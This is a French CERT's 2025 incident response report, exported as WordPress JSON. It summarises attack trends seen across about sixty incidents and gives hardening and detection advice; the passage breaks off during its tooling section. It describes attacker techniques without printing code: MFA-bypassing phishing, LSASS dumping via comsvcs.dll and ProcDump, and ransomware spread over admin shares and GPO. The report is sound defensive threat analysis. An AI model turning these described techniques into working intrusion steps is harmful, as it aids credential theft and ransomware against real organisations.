{"id":231421,"date":"2026-02-24T15:09:37","date_gmt":"2026-02-24T15:09:37","guid":{"rendered":"https:\/\/www.intrinsec.com\/?p=231421"},"modified":"2026-03-27T14:43:56","modified_gmt":"2026-03-27T14:43:56","slug":"cert-intrinsec-incidents-report-2025","status":"publish","type":"post","link":"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/","title":{"rendered":"CERT Intrinsec Incidents Report 2025"},"content":{"rendered":"<p><strong>CERT Intrinsec<\/strong> is a French <a href=\"https:\/\/www.intrinsec.com\/en\/cert-intrinsec\/\">Incident Response team<\/a> providing incident response and crisis management services to organizations across multiple sectors. Certified <strong>PRIS<\/strong> (<em>Security Incident Response Provider<\/em>) by ANSSI since 2022, the team has been operating since 2013 and has handled hundreds of engagements, gaining firsthand insight into the evolution of threat actor tradecraft.<\/p>\n\n\n\n<p>In 2025, <strong>CERT Intrinsec<\/strong> was engaged in approximately sixty significant incidents involving ransomware operators, Initial Access Brokers (IABs), insider threats, and suspected state-sponsored actors conducting intelligence operations. These incidents spanned a wide range of environments, from legacy on-premise infrastructure to cloud-native Microsoft 365 tenants.<\/p>\n\n\n\n<p>This report synthesizes our observations from these engagements <strong>with a focus on actionable findings<\/strong>. 
Rather than presenting descriptive statistics alone, we examine intrusion mechanisms, attacker dwell time, targeted assets, and defensive gaps \u2014 <strong>with the explicit goal of informing detection strategies and hardening priorities for security practitioners<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-methodology\">Methodology<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-scope-and-inclusion-criteria\">Scope and inclusion criteria<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This report covers incident response engagements conducted by CERT Intrinsec between <strong>January and December 2025<\/strong>. An incident was included in our dataset if it met the following criteria: (1) <strong>a confirmed compromise<\/strong>, as opposed to attempted intrusion or false positive, and (2) <strong>a demonstrated impact<\/strong> on confidentiality, integrity, or availability of data or systems.<\/p>\n\n\n\n<p>Applying these criteria, <strong>sixty incidents were retained for analysis<\/strong>. Incidents classified as false positives, near-misses, or limited to reconnaissance activity without successful intrusion were excluded.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-dataset-characteristics\">Dataset characteristics<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The sixty incidents involved <strong>French organizations<\/strong>, including both domestic operations and international subsidiaries. 
The dataset reflects <strong>a diverse cross-section of industries<\/strong>: banking and insurance, construction, agrifood, public sector, transportation, and media &amp; telecommunications.<\/p>\n\n\n\n<p>Regarding organizational size, approximately <strong>two-thirds of affected entities employed over 1,000 staff<\/strong>, while the remaining third were smaller organizations. Two-thirds of engagements involved clients under preexisting retainer agreements; the remaining third were ad-hoc engagements with organizations contacting CERT Intrinsec for the first time.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-data-collection\">Data collection<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>For each incident, the following data points were systematically recorded:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Initial access vector<\/strong><\/li>\n\n\n\n<li><strong>Intrusion date and detection date<\/strong> (enabling dwell time calculation)<\/li>\n\n\n\n<li><strong>Tactics, Techniques, and Procedures<\/strong> (TTPs), mapped to the MITRE ATT&amp;CK framework<\/li>\n\n\n\n<li><strong>Compromised accounts<\/strong> (account and privilege level)<\/li>\n\n\n\n<li><strong>Compromised assets<\/strong> (count and type)<\/li>\n\n\n\n<li><strong>Attacker tooling<\/strong> observed<\/li>\n\n\n\n<li><strong>Data exfiltration<\/strong>, where applicable (volume and method)<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-threat-categorization\">Threat categorization<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Incidents were categorized by threat actor type and assessed intent:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Ransomware operators<\/strong> \u2014 incidents involving encryption, extortion, or both<\/li>\n\n\n\n<li><strong>Initial 
Access Brokers<\/strong> (IABs) \u2014 intrusions focused on establishing persistent access for resale, without direct monetization by the initial threat actor<\/li>\n\n\n\n<li><strong>Insider threats<\/strong> \u2014 malicious or negligent actions by employees or contractors<\/li>\n\n\n\n<li><strong>Espionage<\/strong> (suspected) \u2014 intrusions exhibiting TTPs consistent with intelligence gathering, typically attributed to state-sponsored or state-aligned actors<\/li>\n\n\n\n<li><strong>Undetermined intent<\/strong> \u2014 confirmed compromises where the intrusion was contained before the adversary&#039;s objective could be established<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-limitations-and-potential-biases\">Limitations and potential biases<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Several limitations should be considered when interpreting our findings.<\/p>\n\n\n\n<p><strong>Selection bias<\/strong>. Our dataset exclusively included incidents that were either detected by the victim organization or reported by a third party. Undetected compromises fall outside our visibility.<\/p>\n\n\n\n<p><strong>Client portfolio bias<\/strong>. The sectoral and organizational size distribution reflects CERT Intrinsec&#039;s client base rather than the broader French economic landscape. 
Large organizations and sectors with regulatory compliance requirements (e.g., banking) may be over-represented.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-incident-distribution-by-threat-type\"><strong>Incident distribution by threat type<\/strong><\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The sixty incidents were distributed as follows: <strong>Initial Access Broker activity<\/strong> accounted for approximately one-third of cases, as did incidents where threat actor intent remained undetermined due to early containment. <strong>Ransomware incidents<\/strong> represented roughly one-sixth of engagements. A small number of incidents involved <strong>suspected state-sponsored espionage<\/strong> or <strong>insider threats<\/strong>; given the limited sample size, these categories are discussed qualitatively rather than statistically in subsequent sections.<\/p>\n\n\n\n<p>The relatively high proportion of IAB and undetermined-intent incidents reflects the detection maturity of organizations under retainer agreements, where intrusions were frequently identified before progressing to final-stage objectives such as ransomware deployment or large-scale data exfiltration.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-2025-threat-landscape\">2025 Threat Landscape<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>As CERT Intrinsec responds to incidents affecting a diverse range of clients\u2014from large enterprises with mature cybersecurity practices but complex information systems, to smaller organizations with simpler infrastructures yet limited resources to implement effective security controls\u2014our investigations offer a broad perspective on the evolving threat landscape.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" 
height=\"705\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-1024x705.png\" alt=\"\" class=\"wp-image-231456\" style=\"aspect-ratio:1.4565977416270484;width:573px;height:auto\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-1024x705.png 1024w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-300x206.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-768x529.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-1536x1057.png 1536w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-18x12.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-650x447.png 650w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1.png 1992w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-business-email-compromise-office365-attacks\">Business Email Compromise \u2013 Office365 attacks<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The majority of Business Email Compromises (BEC) encountered by CERT Intrinsec in 2025 involved attacks related to the Microsoft Cloud ecosystem (Office365).<br>In these incidents, we saw two trends emerge:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Adversary-in-the-Middle<\/strong> (AitM) attacks defeating multi-factor authentication protections;<\/li>\n\n\n\n<li><strong>Direct Send abuse<\/strong> to perform targeted phishing attacks.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-adversary-in-the-middle-attacks\">Adversary-in-the-Middle attacks<\/h4>\n\n\n\n<div 
style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Adversary-in-the-Middle<\/strong> (AitM) attacks trick a user into authenticating on a phishing website that imitates the look &amp; feel of the Microsoft authentication page. Instead of simply stealing the targeted user&#039;s credentials, the phishing site goes a step further and triggers the multi-factor authentication process on behalf of the victim. The attacker can therefore <strong>retrieve the victim&#039;s credentials<\/strong> and <strong>an authenticated session<\/strong> on the Entra ID tenant, <strong>bypassing the MFA<\/strong> protection. Tools such as <a href=\"https:\/\/github.com\/kgretzky\/evilginx2\">EvilGinx2<\/a> weaponize this attack.<\/p>\n\n\n\n<p>To prevent your users from falling for these attacks, CERT Intrinsec recommends:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Hardening conditional access policies<\/strong> to block authentications from unknown sources (geo-based or reputation-based)<\/li>\n\n\n\n<li>Using <strong>FIDO2 tokens<\/strong><\/li>\n\n\n\n<li><strong><a href=\"https:\/\/www.intrinsec.com\/en\/sensibilisation-culture-cybersecurite\/\">Raising awareness<\/a><\/strong> among users regarding this kind of attack<\/li>\n\n\n\n<li>Monitoring the <strong>risky sign-ins<\/strong> and <strong>risky users<\/strong> dashboards, etc.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-directsend-attacks\">DirectSend attacks<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>DirectSend<\/strong> is a Microsoft Exchange Online feature <strong>allowing emails to be sent without authentication within the same tenant<\/strong>. 
Misconfiguration of mail infrastructure may allow attackers to abuse this feature to send targeted phishing emails from any user within a tenant to any other user. This abuse was leveraged in several campaigns to send phishing emails aimed at stealing credentials or performing AitM attacks.<\/p>\n\n\n\n<p>In May 2025, Microsoft provided a way to disable this feature. CERT Intrinsec recommends:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Reviewing mail infrastructure and enforcing <strong>strong DMARC policies<\/strong>.<\/li>\n\n\n\n<li><strong>Disabling the Direct Send<\/strong> feature, which is a great way to prevent this abuse but might break legitimate business processes.<\/li>\n\n\n\n<li><strong>Implementing a mail filtering rule<\/strong> to prevent emails from being sent, through DirectSend, from an internal user (sender) to outside the organization.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-exploitation-of-public-facing-applications\">Exploitation of public-facing applications<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The <strong>exploitation of high-severity vulnerabilities against public-facing applications<\/strong> (websites, VPN, SharePoint, etc.) was one of the main causes of security incidents handled by CERT Intrinsec in 2025. 
Often, these incidents were linked to large-scale exploitation of a vulnerability around the time of its publication.<\/p>\n\n\n\n<p>In order to prevent or limit this kind of incident, the following actions should be considered:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Maintaining a <strong>complete, up-to-date inventory of all public-facing applications<\/strong> in the information system.<\/li>\n\n\n\n<li>Having a <strong>strong update policy for public-facing applications<\/strong> (security patches applied in less than 48 hours).<\/li>\n\n\n\n<li><strong>Monitoring CVE<\/strong> (Common Vulnerabilities and Exposures) <strong>publications<\/strong> related to the technologies used in public-facing applications.<\/li>\n\n\n\n<li>Closely <strong>supervising public-facing applications<\/strong> and their underlying systems for any unusual behavior.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-ransomware-attacks\">Ransomware Attacks<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Amongst the approximately ten ransomware incidents investigated in 2025, all followed a <strong>double extortion model<\/strong>: data exfiltration preceded encryption, with the threat of public data exposure used as additional leverage against victims.<br>The ransomware families observed included <strong>Akira, LockBit, Fog, Incransom, and Lynx<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-encryption-techniques\">Encryption techniques<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Two primary deployment methods were observed:<\/p>\n\n\n\n<p><strong>Remote encryption via network shares. 
<\/strong>The most common approach involved executing the ransomware binary from a single compromised system \u2014 typically a domain controller or infrastructure server \u2014 and encrypting data on remote systems through administrative shares (ADMIN$, C$). This method avoids deploying the ransomware payload on each individual endpoint, reducing the attacker&#039;s footprint and limiting detection opportunities at the endpoint level.<\/p>\n\n\n\n<p><strong>Deployment via Group Policy Object (GPO). <\/strong>In one engagement, attackers leveraged Active Directory Group Policy to distribute the ransomware payload as a scheduled task across domain-joined systems, ensuring simultaneous execution at scale. Both methods rely on domain-level privileges, reinforcing the critical importance of protecting Active Directory (see Section 4).<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-pre-encryption-destruction-sequence\">Pre-encryption destruction sequence<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Prior to encryption, attackers systematically targeted backup infrastructure and virtualization platforms to maximize impact and eliminate recovery options:<\/p>\n\n\n\n<p><strong>Hypervisors (VMware ESXi, Hyper-V)<\/strong> \u2013 Destruction or encryption of virtual machines at the hypervisor level;<br><strong>Backup infrastructure (Veeam)<\/strong> \u2013 Access via compromised privileged accounts or exploitation of known Veeam vulnerabilities to delete or encrypt backup repositories.<\/p>\n\n\n\n<p>This destruction phase was observed in every ransomware incident. 
Attackers consistently prioritized eliminating recovery capabilities before triggering encryption \u2014 a deliberate sequence designed to maximize pressure on the victim organization.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-operational-timing\">Operational timing<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The interval between data exfiltration completion and ransomware deployment <strong>was consistently short \u2014 typically one to two days<\/strong>. Encryption was almost invariably initiated during nighttime hours, when security monitoring is reduced and response times are longer.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-recommendations\">Recommendations<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Isolate backup infrastructure from Active Directory<\/strong>. Veeam servers and backup repositories should be deployed outside the Active Directory domain, using dedicated local accounts and separate authentication. A compromised Domain Admin account should not provide access to backup infrastructure.<\/li>\n\n\n\n<li><strong>Implement immutable backups<\/strong>. Configure backup repositories to enforce immutability (write-once, read-many) to prevent deletion or encryption even if the backup server is compromised.<\/li>\n\n\n\n<li><strong>Harden hypervisors independently<\/strong>. ESXi and Hyper-V hosts should not rely on Active Directory authentication. Enforce dedicated local credentials, restrict management interfaces to isolated networks, and apply security patches promptly.<\/li>\n\n\n\n<li><strong>Maintain offline backup copies<\/strong>. At least one backup copy should be physically or logically air-gapped from the production network and domain infrastructure.<\/li>\n\n\n\n<li><strong>Implement out-of-hours monitoring<\/strong>. 
Given the consistent pattern of nighttime deployment, ensure that security operations provide 24\/7 coverage \u2014 or at minimum, automated alerting capable of triggering emergency response during off-hours.<\/li>\n\n\n\n<li><strong>Test recovery capabilities<\/strong>. Regularly validate that backups can be restored in a realistic disaster recovery scenario. Backup infrastructure that has been silently compromised or corrupted provides no protection.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-malicious-vpn-access-stolen-accounts\">Malicious VPN access \u2013 Stolen Accounts<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This refers to situations where <strong>the first action of a malicious actor<\/strong> identified during the incident was a <strong>successful authentication using a valid VPN account<\/strong> (without MFA enabled), granting the attacker access to a company&#039;s internal network.<\/p>\n\n\n\n<p>In this situation, it can be difficult to identify the source of the exploited account&#039;s initial compromise. In some cases, we could trace it back to <strong>the account&#039;s sale by an Initial Access Broker<\/strong> (IAB) on specialized forums thanks to the support of our <strong>CTI squad<\/strong>.<\/p>\n\n\n\n<p>The lack of obvious malicious action at this point of the attack can make it harder to detect the malicious actor quickly, but several actions can be taken in order to prevent or detect this kind of intrusion:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Making Multi-Factor Authentication (MFA) mandatory<\/strong> for any VPN authentication. From our experience, this would have prevented a large number of incidents based on a stolen VPN account.<\/li>\n\n\n\n<li><strong>Identifying the IP&#039;s country of origin and reputation<\/strong>. 
This can be used to either block or raise an alert when an authentication happens from an unusual country or from an IP linked to a VPN or a malicious actor.<\/li>\n\n\n\n<li><strong>Intensifying the use of Cyber Threat Intelligence<\/strong> (CTI) to identify accounts being sold by malicious actors before they can be exploited.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-workstation-compromise\">Workstation Compromise<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Another prevalent initial access method involved the <strong>compromise of end-user workstations<\/strong> through social engineering. Attackers leveraged tactics such as <strong>fake CAPTCHA<\/strong> challenges (e.g., ClickFix), malicious <strong>online advertisements<\/strong>, and compromised or spoofed websites.<\/p>\n\n\n\n<p>These techniques were used to deliver payloads, particularly infostealers, capable of harvesting credentials, session cookies, and other sensitive data.<\/p>\n\n\n\n<p>The infostealer ecosystem operates at industrial scale: users can also be infected through <strong>malicious downloads, trojanised software cracks, or compromised legitimate applications<\/strong>. Harvested credentials are aggregated and sold on dedicated marketplaces and Telegram channels, often within hours of collection. The time elapsed between credential theft and exploitation by a threat actor varied considerably, ranging from less than 24 hours to several months. This variability complicates detection: organizations cannot assume that credentials stolen months ago are \u201cstale\u201d or unexploitable.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Enforce MFA on all remote access<\/strong> \u2014 VPN, Microsoft 365, and any internet-facing authentication portal. 
This single control addresses the root cause of 80% of observed incidents.<\/li>\n\n\n\n<li><strong><a href=\"https:\/\/www.intrinsec.com\/en\/digital-risk-protection-services-drps\/\">Monitor credential exposure &amp; subscribe to CTI<\/a><\/strong> \u2014 Integrate leaked credential detection into security operations.<\/li>\n\n\n\n<li><strong>Reduce credential validity<\/strong> \u2014 Implement shorter session lifetimes and conditional access policies to limit the window of exploitation for stolen credentials.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-malicious-insider\">Malicious Insider<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>In addition to external threats, CERT Intrinsec investigated a few incidents involving <strong>malicious insiders<\/strong> in 2025.<\/p>\n\n\n\n<p>These individuals abused their legitimate access to carry out unauthorized actions, such as <strong>stealing corporate workstations<\/strong> or <strong>deleting critical data from CRM systems<\/strong>.<\/p>\n\n\n\n<p>Such cases emphasize the importance of <strong>access monitoring, privilege segregation, and user activity logging.<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-incident-scale-and-detection-timelines\">Incident Scale and Detection Timelines<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>During the incidents investigated, <strong>up to 30 devices were compromised per incident<\/strong>, with <strong>up to 32 user accounts affected<\/strong> depending on detection and containment speed.<\/p>\n\n\n\n<p><strong>The time between initial compromise and CERT activation ranged from 15 hours to 90 days. 
The median time was 7 days, often including phases of detection, impact assessment, containment, internal investigation, and formal reporting.<\/strong><\/p>\n\n\n\n<p>Notably, some threats remained undetected for extended periods due to <strong>evasion techniques<\/strong> or <strong>gaps in monitoring across parts of the information system<\/strong>. For example, compromised websites\u2014later used to steal banking credentials or distribute malware\u2014were often discovered several months after the initial breach.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-other-notable-tendencies\">Other notable trends<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-privilege-escalation-and-credential-access\">Privilege Escalation and Credential Access<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p id=\"h-once-initial-access-was-established-threat-actors-systematically-sought-to-escalate-privileges-and-harvest-additional-credentials-in-corporate-network-environments-active-directory-remained-the-primary-target-with-attackers-exploiting-a-combination-of-misconfiguration-weak-credential-hygiene-and-insufficient-segmentation-the-techniques-described-below-were-not-observed-in-a-fixed-sequence-rather-attackers-opportunistically-employed-whichever-methods-yielded-results-in-each-specific-environment\">Once initial access was established, threat actors systematically sought to escalate privileges and harvest additional credentials. 
In corporate network environments, <strong>Active Directory<\/strong> remained the primary target, with attackers exploiting a combination of <strong>misconfiguration, weak credential hygiene, and insufficient segmentation<\/strong>.<br>The techniques described below were not observed in a fixed sequence; rather, <strong>attackers opportunistically employed whichever methods yielded results<\/strong> in each specific environment.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-credential-harvesting-techniques\">Credential harvesting techniques<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Extraction of credentials from <strong>LSASS process memory<\/strong> was observed in nearly all incidents involving corporate network compromise. Threat actors employed various techniques to evade detection, including <strong>abuse of native Windows tools<\/strong>: comsvcs.dll invoked via rundll32, Task Manager&#039;s dump functionality, or signed binaries such as ProcDump. Extracted memory dumps were typically exfiltrated to attacker-controlled infrastructure for offline analysis, avoiding the need to run credential extraction tools (e.g., Mimikatz) directly on victim systems.<\/p>\n\n\n\n<p>In several incidents, attackers harvested <strong>credentials stored by applications<\/strong>, including web browsers, file transfer clients (WinSCP, FileZilla), and remote management tools (mRemoteNG). These credentials often provided access to additional systems or third-party services. 
In isolated cases, sophisticated actors <strong>deployed hooks on authentication pages of internal applications<\/strong> (e.g., GLPI) to intercept administrator credentials in real time.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-commonly-exploited-active-directory-weaknesses\">Commonly exploited Active Directory weaknesses<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Several <strong>Active Directory misconfigurations<\/strong> recurred across engagements:<\/p>\n\n\n\n<p>excessive privileges, delegation issues, hard-coded service credentials, local administrator password reuse, weak or reused passwords, etc.<br>These weaknesses are well-documented and frequently highlighted in penetration test reports. Their persistence in production environments <strong>reflects a gap between security assessment findings and remediation implementation<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-high-value-targets\">High-value targets<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Attackers prioritized specific system categories for credential harvesting:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Administrator workstations<\/strong> \u2014 frequently containing cached credentials, browser sessions, and access to privileged tools;<\/li>\n\n\n\n<li><strong>Infrastructure servers<\/strong> \u2014 domain controllers, hypervisors, backup servers, and management consoles;<\/li>\n\n\n\n<li><strong>Jump hosts and bastion servers<\/strong> \u2014 by design, these systems aggregate privileged sessions and credentials.<\/li>\n<\/ul>\n\n\n\n<p>Compromise of any single high-value target often provided sufficient credentials for lateral movement to the remainder of the environment.<\/p>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" 
id=\"h-defensive-implications\">Defensive implications<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The prevalence of credential harvesting and Active Directory exploitation supports the following defensive priorities:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Implement Privileged Access Workstations (PAW)<\/strong>. Isolate administrative activities on hardened, dedicated systems to prevent credential exposure on standard endpoints.<\/li>\n\n\n\n<li><strong>Deploy LAPS (Local Administrator Password Solution)<\/strong>. Eliminate local administrator password reuse by enforcing unique, automatically rotated passwords per system.<\/li>\n\n\n\n<li><strong>Enforce Active Directory tiering<\/strong>. Prevent credential exposure across trust boundaries by segregating Tier 0 (domain controllers), Tier 1 (servers), and Tier 2 (workstations) administration.<\/li>\n\n\n\n<li><strong>Audit and reduce privileged accounts<\/strong>. Regularly review accounts with Domain Admin, Enterprise Admin, or equivalent privileges; remove unnecessary memberships.<\/li>\n\n\n\n<li><strong>Eliminate hard-coded credentials<\/strong>. Audit scripts, scheduled tasks, and service configurations for embedded passwords; migrate to managed service accounts (gMSA) or secrets management solutions.<\/li>\n\n\n\n<li><strong>Protect LSASS<\/strong>. Enable Credential Guard where supported; configure LSA protection (RunAsPPL); monitor for suspicious access to the LSASS process.<\/li>\n\n\n\n<li><strong>Detect reconnaissance tooling<\/strong>. Implement detection rules for SharpHound\/BloodHound LDAP query patterns, anomalous SPN requests (Kerberoasting indicators), and large-scale Active Directory enumeration.<\/li>\n\n\n\n<li><strong>Strengthen service account passwords<\/strong>. 
Enforce long, complex passwords (25+ characters) for accounts with SPNs to make Kerberoasting impractical.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-execution-and-tooling\">Execution and Tooling<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Attackers required command execution capabilities throughout the intrusion lifecycle \u2014 from internal reconnaissance to privilege escalation, lateral movement, and impact. In all observed incidents, threat actors relied on <strong>native Windows interpreters<\/strong> (PowerShell, cmd.exe) for basic operations, supplemented by <strong>specialized tooling for more complex tasks<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-post-exploitation-frameworks-and-tooling\">Post-exploitation frameworks and tooling<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Several post-exploitation tools were commonly observed across engagements: <strong>NetExec<\/strong> (formerly CrackMapExec) was frequently used for credential validation, lateral movement, and remote command execution. This framework offers multiple execution modules, each leaving distinct forensic artifacts:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>smbexec<\/strong>: remote service creation, leaving Service Creation events (Event ID 7045)<\/li>\n\n\n\n<li><strong>atexec<\/strong>: remote scheduled task, leaving Scheduled Task creation events (Event ID 4698)<\/li>\n<\/ul>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Impacket<\/strong> scripts (wmiexec.py, smbexec.py, psexec.py) were also observed. 
